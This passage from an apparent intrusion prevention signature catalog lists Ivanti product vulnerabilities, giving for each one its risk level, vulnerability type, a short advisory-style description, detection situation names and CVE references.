sgpkg-ips-1844-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

A vulnerability in Ivanti Avalanche, versions prior to 6.4.5, which allows remote attackers to bypass authentication and disclose sensitive information, due to the lack of input validation of the request URI.

Situation:

HTTP_CS-Ivanti-Avalanche-Securefilter-Dofilter-CVE-2024-47009-Authentication-Bypass

References:

CVE-2024-47009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47009

Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1710-5242

Last changed:

sgpkg-ips-1710-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

An XML External Entity Injection vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to insufficient validation of user input sent to the SmartDeviceServer. A remote, unauthenticated attacker could exploit this vulnerability by sending malicious XML in an HTTP request to the target server. Successful exploitation could result in the disclosure of information in the context of SYSTEM.

Situation:

File-TextId_Ivanti-Avalanche-Smartdeviceserver-Connectservlet-Xml-External-Entity-Injection

References:

CVE-2023-46265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46265

Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1597-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Ivanti Avalanche SmartDeviceServer. The vulnerability is due to a lack of input validation in the getLogFile method of the DeviceLogsManager class. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the read of arbitrary files on the target server under the security context of the server process.

Situation:

Generic_TCP-Ivanti-Avalanche-Smartdeviceserver-Devicelogsmanager-Directory-Traversal

References:

CVE-2022-36982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36982

Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to a insufficient validation of input in the DeviceLogResource class for the Smart Device Server. A remote attacker could exploit this vulnerability by sending crafted requests to the target server. Successfully exploiting this vulnerability could result in remote code execution in the context of SYSTEM.

Situation:

HTTP_CSU-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
Generic_CS-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal

References:

CVE-2022-36981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36981

Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1435-5242

Last changed:

sgpkg-ips-1435-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Insufficient validation of serialized data sent to the StatServer service of Ivanti Avalanche causes an insecure deserialization vulnerability, which can be exploited to allow an attacker to execute arbitrary code on the target with system privileges.

Situation:

Generic_CS-Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization

References:

CVE-2021-42127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42127

Ivanti-Avalanche-Validateamcwsconnection-Server-Side-Request-Forgery

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1857-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Improper input validation in data sent to the Remote Control Server causes a server-side request forgery vulnerability in Ivanti Avalanche. A successful exploitation may lead to the disclosure of privileged information.

Situation:

HTTP_CRL-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery
ARCserve_CS-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery

References:

CVE-2024-47008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47008

Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1498-5242

Last changed:

sgpkg-ips-1498-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Insufficient validation of data sent to the Web File Server before deserialization causes a vulnerability in Ivanti Avalanche. A successful exploit allows an attacker to execute arbitrary code on the target.

Situation:

Generic_CS-Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization

References:

CVE-2022-36974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36974

Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1494-5242

Last changed:

sgpkg-ips-1494-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Race Condition

Description:

Improper synchronization of requests received and responses sent by the Avalanche Web Server causes an authentication bypass vulnerability which can be exploited to gain access to the system without authentication.

Situation:

Generic_CS-Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass

References:

CVE-2022-36980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36980

Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1627-5242

Last changed:

sgpkg-ips-1627-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in Ivanti Avalanche. The vulnerability is due to improper validation of messages sent over port 1777. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the vulnerable service.

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow

References:

CVE-2023-32560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32560

Ivanti-Avalanche-Wlavalancheservice.exe-TV_FN-Infinite-Loop

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Infinite Loop

Description:

A denial of service vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to an infinite loop when handling TV_FN InfoRail headers in the WLAvalancheService.exe component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server.

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference

References:

CVE-2024-50319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50319

Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1781-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported for Ivanti Avalanche. This vulnerability is due to a memory access error in WLAvalancheService.exe when handling Type 100 InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference

References:

CVE-2024-37399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37399

Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1684-5242

Last changed:

sgpkg-ips-1684-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Buffer Overflow

Description:

A stack-buffer overflow vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to improper input validation when handling InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service or, in the worst case, remote code execution in the security context of SYSTEM.

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow

References:

CVE-2023-41727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41727

Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1800-5242

Last changed:

sgpkg-ips-1802-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to a memory access error in WLAvalancheService.exe when handling Type 101 and 102 properties in InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service. CVE identifiers CVE-2024-50317 and CVE-2024-50318 are also assigned to this vulnerability.

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-102-Null-Pointer-Dereference

References:

CVE-2024-47007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47007

Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1678-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Buffer Overflow

Description:

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow

References:

CVE-2023-46216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46216

Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

High

First detected in:

sgpkg-ips-1674-5242

Last changed:

sgpkg-ips-1674-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Buffer Overflow

Description:

Situation:

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow

References:

CVE-2023-46217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46217

Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Ivanti Avalanche

Risk:

Moderate

First detected in:

sgpkg-ips-1793-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Generic

Software:

Ivanti Avalanche

Type:

Input Validation

Description:

Improper input validation in the WLInfoRailService.exe component when handling h.payform messages causes an out of bounds read vulnerability in Ivanti Avalanche. A successful exploitation allows an attacker to cause a denial of service condition on the target system.

Situation:

Generic_CS-Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read

References:

CVE-2024-36136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36136

Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection

About this vulnerability:

A vulnerability in Ivanti Cloud Services Appliance.

Risk:

High

First detected in:

sgpkg-ips-1550-5242

Last changed:

sgpkg-ips-1550-5242

Platform:

Unix; Linux

Software:

Ivanti Cloud Services Appliance

Type:

Input Validation

Description:

A vulnerability in Ivanti Cloud Services Appliance, versions before 4.6.0-512, which allows remote attackers to execute arbitrary code via a Cookie due to insufficient input validation.

Situation:

HTTP_CSH-Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection

References:

CVE-2021-44529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44529

Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass

About this vulnerability:

A vulnerability in Ivanti Cloud Service Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Malfunction

Description:

Improper validation of user submitted paths causes an authentication bypass vulnerability in Ivanti Cloud Service Appliance. A successful exploitation allows an attacker to access restricted functionality on the service.

Situation:

HTTP_CSU-Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass

References:

CVE-2024-8963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8963

Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190

About this vulnerability:

A vulnerability in Ivanti Cloud Services Appliance

Risk:

High

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and earlier. Exploiting this vulnerability requires authentication, but a misconfiguration during the setup of the vulnerable software may allow an attacker to use the default credentials. Authentication requirements may also be bypassed by exploiting CVE-2024-8963 first.

Situation:

HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190

References:

CVE-2024-8190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8190

Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380

About this vulnerability:

A vulnerability in Ivanti Cloud Services Appliance

Risk:

High

First detected in:

sgpkg-ips-1793-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380

References:

CVE-2024-9380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9380

Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963

About this vulnerability:

A vulnerability in Ivanti Cloud Services Appliance

Risk:

High

First detected in:

sgpkg-ips-1793-5242

Last changed:

sgpkg-ips-1793-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Directory Traversal

Description:

A path traversal vulnerability exists in the Ivanti Cloud Services Appliance 4.6 before patch 519. An unauthenticated attacker can use this vulnerability to access restricted functionalities.

Situation:

HTTP_CSU-Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963

References:

CVE-2024-8963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8963

Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Cloud Service Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1796-5242

Last changed:

sgpkg-ips-1796-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Ivanti Cloud Services Appliance. This vulnerability is due to improper input validation when updating the CSA service configuration. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CRL-Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection

References:

CVE-2024-9379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9379

Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908

About this vulnerability:

A vulnerability in Ivanti Cloud Services Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Input Validation

Description:

Improper input validation when sending a user lockout notification causes a command injection vulnerability in Ivanti Cloud Services Appliance. A succesful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CS-Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908

References:

CVE-2024-47908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47908

Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection

About this vulnerability:

A vulnerability in Ivanti Connect Secure (ICS)

Risk:

Moderate

First detected in:

sgpkg-ips-1803-5242

Last changed:

sgpkg-ips-1803-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Input Validation

Description:

Improper validation of user data containing carriage return and line feed characters when creating new certificates causes a vulnerability in Ivanti Connect Secure. A successful exploitation allows an attacker to inject a payload onto the target and potentially execute arbitrary code.

Situation:

HTTP_CRL-Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection

References:

CVE-2024-37404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37404

Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Connect Secure detected

Risk:

High

First detected in:

sgpkg-ips-1819-5242

Last changed:

sgpkg-ips-1819-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Input Validation

Description:

Improper input validation in the admin portal of Ivanti Connect Secure before 22.7R2.1 and 9.1R18.9, or Ivanti Policy Secure before 22.7R1.1 allows a remote authenticated attacker to achieve remote code execution via OpenSSL CRLF injection.

Situation:

HTTP_CRL-Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404

References:

CVE-2024-37404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37404

Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805

About this vulnerability:

A vulnerability in Ivanti Connect Secure

Risk:

High

First detected in:

sgpkg-ips-1676-5242

Last changed:

sgpkg-ips-1676-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Ivanti Connect Secure and Ivanti Policy Secure.

Situation:

HTTP_CSU-Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805

References:

CVE-2023-46805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46805

Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457

About this vulnerability:

A vulnerability in Ivanti Connect Secure

Risk:

High

First detected in:

sgpkg-ips-1864-5242

Last changed:

sgpkg-ips-1864-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Buffer Overflow

Description:

A stack buffer overflow in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways allows unauthenticated remote code execution via an overly long X-Forwarded-For HTTP request header value.

Situation:

HTTP_CSH-Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457

References:

CVE-2025-22457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-22457

Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Connect Secure detected

Risk:

High

First detected in:

sgpkg-ips-1676-5242

Last changed:

sgpkg-ips-1676-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Input Validation

Description:

Ivanti Connect Secure (ICS, formerly known as Pulse Connect Secure) and Ivanti Policy Secure contain a command injection vulnerability in the web components of these products, which can allow an authenticated administrator to send crafted requests to execute code on affected appliances. This vulnerability can be leveraged in conjunction with CVE-2023-46805, an authenticated bypass issue.

Situation:

HTTP_CSU-Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
File-Text_Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887

References:

CVE-2024-21887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21887

Ivanti-Connect-Secure-Command-Injection-Vulnerability-CVE-2024-21887

About this vulnerability:

A vulnerability in Ivanti Connect Secure

Risk:

High

First detected in:

sgpkg-ips-1687-5242

Last changed:

sgpkg-ips-1687-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA.

Situation:

File-TextId_Ivanti-Connect-Remote-Code-Execution-Chain-CVE-2024-21893-CVE-2024-21887

References:

CVE-2024-21887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21887

Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282

About this vulnerability:

A vulnerability in Ivanti Connect Secure

Risk:

Critical

First detected in:

sgpkg-ips-1825-5242

Last changed:

sgpkg-ips-1825-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability allows unauthenticated remote code execution in Ivanti Connect Secure versions before 22.7R2.5. Ivanti Policy Secure versions before 22.7R1.2 and Ivanti Neurons for ZTA gateways versions 22.7R2.3 are also affected.

Situation:

HTTP_CS-Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282

References:

CVE-2025-0282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0282

Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893

About this vulnerability:

A vulnerability in Ivanti Connect Secure

Risk:

High

First detected in:

sgpkg-ips-1687-5242

Last changed:

sgpkg-ips-1691-5242

Platform:

Generic

Software:

Ivanti Connect Secure

Type:

Malfunction

Description:

A server-side request forgery vulnerability has been reported in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA.

Situation:

HTTP_CSU-Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
HTTP_CSU-Ivanti-Connect-Auth-Bypass-CVE-2024-22024
File-TextId_Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
File-TextId_Ivanti-Connect-Remote-Code-Execution-Chain-CVE-2024-21893-CVE-2024-21887

References:

CVE-2024-21893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21893

Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773

About this vulnerability:

A vulnerability in Ivanti Cloud Services Appliance

Risk:

High

First detected in:

sgpkg-ips-1832-5242

Last changed:

sgpkg-ips-1832-5242

Platform:

Generic

Software:

Ivanti Cloud Services Appliance

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Ivanti Cloud Services Appliance. This vulnerability is due to improper input validation when removing core certificates. Successful exploitation could result in arbitrary SQL command execution against the target server's database.

Situation:

HTTP_CRL-Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773

References:

CVE-2024-11773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11773

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-10811

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected

Risk:

High

First detected in:

sgpkg-ips-1840-5242

Last changed:

sgpkg-ips-1840-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Absolute path traversal in Ivanti Endpoint Manager before the January-2025 security updates allows a remote unauthenticated attacker to leak sensitive information through the "GetHashForFile()" method.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore

References:

CVE-2024-10811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10811

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13159

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected

Risk:

High

First detected in:

sgpkg-ips-1840-5242

Last changed:

sgpkg-ips-1840-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore

References:

CVE-2024-13159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13159

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13160

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected

Risk:

High

First detected in:

sgpkg-ips-1840-5242

Last changed:

sgpkg-ips-1840-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore

References:

CVE-2024-13160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13160

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13161

About this vulnerability:

An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected

Risk:

High

First detected in:

sgpkg-ips-1840-5242

Last changed:

sgpkg-ips-1840-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore

References:

CVE-2024-13161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13161

Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Improper validation of user input in the MPCore server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330

References:

CVE-2024-50330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50330

Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1858-5242

Last changed:

sgpkg-ips-1858-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Directory Traversal

Description:

Improper validation of file paths causes a directory traversal vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to make the target system open and execute arbitrary files.

Situation:

File-Text_Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
HTTP_CRL-Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal

References:

CVE-2024-50322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50322

Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Directory Traversal

Description:

A vulnerability in Ivanti Endpoint Manager, versions 2022 SU6 September security update and prior, and 2024 September Security Update and prior, which allows remote attackers to execute arbitrary code due to the improper validation of the xml DestinationPath parameter.

Situation:

File-TextId_Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal

References:

CVE-2024-34787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34787

Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Directory Traversal

Description:

Improper validation of a file paths causes a directory traversal vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal

References:

CVE-2024-50324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50324

Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1799-5242

Last changed:

sgpkg-ips-1799-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Improper validation of user input in the core server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

File-TextId_Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection

References:

CVE-2024-8191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8191

Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

High

First detected in:

sgpkg-ips-1745-5242

Last changed:

sgpkg-ips-1745-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager. A remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.

Situation:

File-TextId_Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection

References:

CVE-2024-29825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29825

Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1770-5242

Last changed:

sgpkg-ips-1770-5242

Platform:

Generic

Software:

Ivanti Endpoint Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection

References:

CVE-2024-29830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29830

Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection

About this vulnerability:

A vulnerability in Ivanti Endpoint Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1793-5242

Last changed:

